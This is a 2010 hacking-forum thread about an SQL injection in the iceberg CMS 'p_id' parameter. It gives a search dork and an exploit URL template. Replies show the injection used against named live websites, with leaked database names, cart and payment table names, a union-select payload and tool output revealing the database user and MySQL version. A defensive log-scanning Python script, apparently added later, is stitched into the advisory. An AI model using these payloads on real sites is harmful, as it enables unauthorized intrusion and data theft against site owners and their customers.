[Bug] SQL injection in iceberg 'Content Management System'
The iceberg 'Content Management System' SQL Injection Vulnerability
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : by cyberlog
Published : 27.05.2010
Affected Software : imagetraders:iceberg_cms
==========================================================
The iceberg 'Content Management System' SQL Injection Vulnerability
==========================================================
# The iceberg 'Content Management System' SQL Injection Vulnerability
# Homepage : http://www.imagetraders.com.au
# Discovered : by cyberlog
# Dork : details.php?p_id= 'Design & SEO by Image Traders Pty Ltd'
# Exploit : http://[target]/details.php?p_id=[SQL Injection]
# Thanks : r0073r,adhietslank, k1n9k0ng, cr4wl3r,cah_gemblunkz,
jayoes,thesims,setiawan,irvian,EA_Angel,BlueSpy,SoEy,A-technique,Jantap,KiL
L SarifJedul,wiro gendeng,Letjen,ridho_bugs,Ryan
Kabrutz,Mathewsa.k.a Nyubicrew
# My Site : http://sekuritionline.net
# Channel : #sekuritionline
#special to Mama Sri Rahayu, Member & Staff Sekuritonline, C0li a.k.a
antisecurity [ borrowed his perl script ] ,
Inj3ct0r Now Brothers with Sekuritionline
==============================================
We never die !!!! indonesian Underground Community
KacrUt I L0v3 U
Give me NOCAN Brothers
am nt hacker just Lik3 Syst3m S3curity
References :
http://xforce.iss.net/xforce/xfdb/58617
http://www.vupen.com/english/advisories/2010/1161
http://www.osvdb.org/64694
http://www.exploit-db.com/exploits/12620
http://secunia.com/advisories/39833
http://packetstormsecurity.org/1005-exp ... rg-sql.txt
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
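For site owners running the affected script, one way to spot probing of the `p_id` parameter named in the advisory is to flag any `details.php` request whose `p_id` is not a plain integer. This is an added example, not part of the original post or the vendor's code; the log format (Apache combined) and every sample log line are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client IP and request target from an Apache combined-format line (assumed format).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" \d{3}')

# Constructed sample lines using documentation IP ranges; not from any real server.
SAMPLE_LOG = """\
198.51.100.7 - - [27/May/2010:10:01:02 +0700] "GET /details.php?p_id=62 HTTP/1.1" 200 5120
203.0.113.9 - - [27/May/2010:10:01:09 +0700] "GET /details.php?p_id=62%27 HTTP/1.1" 200 312
203.0.113.9 - - [27/May/2010:10:01:15 +0700] "GET /details.php?p_id=269+order+by+2-- HTTP/1.1" 200 298
203.0.113.9 - - [27/May/2010:10:01:30 +0700] "GET /details.php?p_id=-1+union+all+select+1,2,3-- HTTP/1.1" 200 4800
198.51.100.7 - - [27/May/2010:10:02:00 +0700] "GET /index.php?p_id=abc HTTP/1.1" 200 900
198.51.100.8 - - [27/May/2010:10:02:05 +0700] "GET /details.php HTTP/1.1" 200 700
"""


def suspicious_p_id(line, script="/details.php", param="p_id"):
    """Return (ip, decoded value) when `param` on `script` is not a plain
    non-negative integer; return None for clean or unrelated requests."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path.lower() != script:
        return None
    # parse_qs percent-decodes and maps '+' to a space, so encoded probes
    # are compared in decoded form; blank values are kept so "p_id=" is seen.
    values = parse_qs(url.query, keep_blank_values=True).get(param)
    if values is None:
        return None
    for value in values:  # check every copy in case the parameter is repeated
        if not re.fullmatch(r"\d{1,10}", value):
            return (m.group("ip"), value)
    return None


def scan(log_text):
    """Collect every flagged (ip, value) pair from a block of log text."""
    hits = [suspicious_p_id(line) for line in log_text.splitlines()]
    return [hit for hit in hits if hit is not None]


if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip}\tp_id={value!r}")
```

The same allow-list rule (digits only) is what the script itself should enforce on `p_id` before the value reaches the database, together with a parameterized query.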
Re: [Bug]SQL injection in iceberg 'Content Management Syst
Wow, bro poni, you really never quit, huh :love:
thanks, sir
Re: [Bug]SQL injection in iceberg 'Content Management Syst
Above is one of the SQL injection bugs found by cyberlog from the forum of our brothers at sekuritionline, in the imagetrader CMS product owned by iceberg. As a POC, let's look at the website below:
and after checking, the following was found:
From here, please study it on your own.
Code: Select all
http://www.wielandhelicopters.com.au/details.php?p_id=62'
Code: Select all
database = wiehel1_wielandhelicopters0com0au
and consists of the tables
.::...Cr3ditz......::....
join us : www.xcode.or.id - 001101
"@ b3tt3r d1g1t4l w0rlD" -- 010110000110001001
- shinichi81
- Posts: 137
- Joined: Tue Jan 19, 2010 6:25 pm
- Location: Bandung Van Java
Re: [Bug]SQL injection in iceberg 'Content Management Syst
Permission to study this, bro poni........
............make a wish............
- 3xtr3m3b0y
- Posts: 317
- Joined: Wed Apr 22, 2009 5:11 pm
- Location: ~[Hacked Machine]~
Re: [Bug]SQL injection in iceberg 'Content Management Syst
Oh noooo... :pusing:
poni wrote: and after checking, the following was found:
Code: Select all
database = wiehel1_wielandhelicopters0com0au and consists of the tables cart_product cart_payment_type cart_payment_paypal cart_payment_cc cart_payment_bankdep cart_payment cart_option cart_history cart_config
Dear God, strengthen my heart...
Nice share Master PONI... :love:
...n0 l1m17...
Re: [Bug]SQL injection in iceberg 'Content Management Syst
Awesome bro, permission to explore :love: :love:
.::. My Sign .::.
..noobie Pool..
Whether you use tools or not doesn't matter; what's important is understanding what you're doing
karma37.wordpress.com
koleksiomel.blogspot.co.id
Re: [Bug]SQL injection in iceberg 'Content Management Syst
I only got something like this....
http://www.target.com.au/details.php?p_id=269 order by 1-- (no error)
but when it's like this
http://www.target.com.au/details.php?p_id=269 order by 2-- (why does it error?)
please enlighten me :mati: :mati:
.::. My Sign .::.
..noobie Pool..
Whether you use tools or not doesn't matter; what's important is understanding what you're doing
karma37.wordpress.com
koleksiomel.blogspot.co.id
Re: [Bug]SQL injection in iceberg 'Content Management Syst
a tasty meallll.. :tapa: :tapa:
huwahahaha.. :ngakak: :ngakak:
Re: [Bug]SQL injection in iceberg 'Content Management Syst
Whoa, finally managed to find one.... just by paying attention to the type of error, the number of columns can be found :devil :devil
CMIIW :love: :love:
Code: Select all
URL:http://www.imagetraders.com.au/details.php?p_id=-1+union+all+select+1,darkc0de,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
[+] Evasion Used: "+" "--"
[+] 15:32:20
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: imatra_imagetraders0com0au
User: imatra_cms@localhost
Version: 5.0.90-community
.::. My Sign .::.
..noobie Pool..
Whether you use tools or not doesn't matter; what's important is understanding what you're doing
karma37.wordpress.com
koleksiomel.blogspot.co.id
- abit doang
- Posts: 212
- Joined: Wed Mar 19, 2008 3:51 pm
- Location: cd ../
Re: [Bug]SQL injection in iceberg 'Content Management Syst
nice,...
I'll just hit it with fuzz, ah,..
forgive me, I'm a newbie...
:tapa:
O ALLAH, make us all wealthy, so that we may share even more
and grant us the best partner from You.
aamiin..
http://abid912.wordpress.com/
http://maniak-online.blogspot.com/